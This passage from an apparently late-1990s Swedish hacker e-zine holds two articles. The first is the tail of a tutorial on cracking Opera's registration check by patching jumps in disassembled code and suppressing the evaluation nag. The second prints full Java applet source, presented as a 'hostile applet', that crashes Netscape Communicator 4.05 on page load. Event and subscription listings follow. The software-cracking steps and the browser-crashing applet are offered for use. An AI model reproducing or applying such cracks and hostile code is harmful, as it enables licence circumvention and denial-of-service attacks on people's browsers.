004B6ED4 803800 cmp byte ptr [eax],00
004B6ED9 7415 je 004B6EF0
004B6EDB 81C190030000 add ecx, 00000390
004B6EE1 51 push ecx
004B6EE2 E8C49BFDFF call 00490AAB
004B6EE7 85C0 test eax,eax
004B6EE9 59 pop ecx
004B6EEA 7404 je 004B6EF0
004B6EEE 6A01 push 00000001
004B6EEF C3 ret
004B6EF0 33C0 xor eax,eax
004B6EF2 C3 ret
Som ni ser är den ganska enkel att fixa. NOP:a alla hopp och Opera fungerar
som...registrerat. Har ni tid och ork kan ni istället använda SoftIce och
fylla de variabler som sedan används vid Registered To:, men det är överkurs
så det tar jag inte upp. Programmet är registrerat och cracket nästan slut.
Ytterligare en lite sak bara. Om du tycker det är irriterande med "The
evaluation period has expired" rutan som dyker om lite slumpmässigt, så inc
ax precis innan ret. Eller not. Smaksak.
-=- Efterord -=-
Om ni inte hängde med riktigt i hur cracket utfördes eller hur jag kom till
de kodstycken jag kom så var lugn, det gör inte jag heller. Därför hänvisas
alla klagomål, önskningar och frågor till /dev/null. *Gromf*. Hex för NOP?
90. Något mer var det väl inte. Just det ja.
Skriven Av:
R. G. Gazzaud
Kontakta mig på
gazzaud@operamail.com
eller
gazzaud@hotmail.com
eller
#SweHack
eller
#crack
eller
#programming.se
Hehehe... Se det som ännu mer reklam i detta kapitalistiska och egoistiska
samhälle vi har. 'nuff said.
----***** END OF LIFE AS WE KNOW IT - DEATH *****----
----------------------------------------------------------------------------
Skrivet av Gazzaud | gazzaud@operamail.com
----------------------------------------------------------------------------
____________________________________________________________________________
K R A S C H A N E T S C A P E [2.8]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
/*
*
* Denna appleten visar ett enkelt och elegant :) sätt att krascha Netscape
* Communicator 4.05. Denna appleten visar också hur lite kod som faktisk
* behövs för att man ska ha lagat sig en hostile applet (Thank you Netscape)
* För att kompilera denna appleten behövs det att du lägger Communicator's
* classes i din CLASSPATH enviraoment.
*
*/
import netscape.softupdate.*; // Detta er en Netscape's
public class CrashCom405 extends java.applet.Applet implements Runnable{
Thread controller = null;
SoftwareUpdate su = null;
public void init() {
/* Vi ska bara krascha...så vi behöver inte initiera något */
}
/*
* Denna metoden kallas automatisk
* efter init metoden, i ett applet enviroment. *
*/
public void start(){
if (controller == null) { /* suprise */
controller = new Thread(this);
/*
* Vi startar en ny prosses av detta programmet
*/
controller.start(); /* Den nya processen kallar och kallar på..:)*/
}
}
public void stop() {} /* Göra inget vid stop */
/*
* Denna metoden kallar automatisk efter start och kör appleten
*/
public void run() {
su = new SoftwareUpdate(null, null);
/*
* Gillar vi null parametere ... eller inte:)
*/
}
/*
*Krash boom bang.....bye bye Comunicator
*/
}
----------------------------------------------------------------------------
Skrivet av Contagion | con@linux.nu
----------------------------------------------------------------------------
____________________________________________________________________________
H Y P E R L Ä N K A R [2.9]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
http://surf.to/def99/
Demo Lan Party i Karlskrona. Datum är inte satt än, men troligtvisst någon
gång i sommar. Om ni anmäler er innan februari kostar det 150 kr. annars
kostar det 250 kr. Anmälan görs genom ett e-mail till <hellium@linux.nu> med
information om namn, nick och ort samt en inbetalning på PG#: 183 25 55-5 .
http://www.swefest.cjb.net/
Denna sida innehåller information om ett party för #Swehack folk som kommer
att hållas någon gång i sommar. Ett trevligt initiativ vilket jag inte är på
något sätt ansvarig eller upphovsman till.
____________________________________________________________________________
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
____________________________________________________________________________
__ _____
/ _\ _ _ / _ / Redaktör: Contagion | con@linux.nu
\ \ | | | | \// /
_\ \ | |_| |_ / //\_ Hemsida: http://swehack.cjb.net
\__/(_)__,_(_)____(_) IRC: #Swehack @ DALnet
Börja att prenumerera på Swehack Underground Zine genom att skicka ett
e-mail med Subscribe som ämne (subject) till suz@linux.nu
____________________________________________________________________________
____________________________________________________________________________
=========E====N====D============O=====F============F====I====L====E=========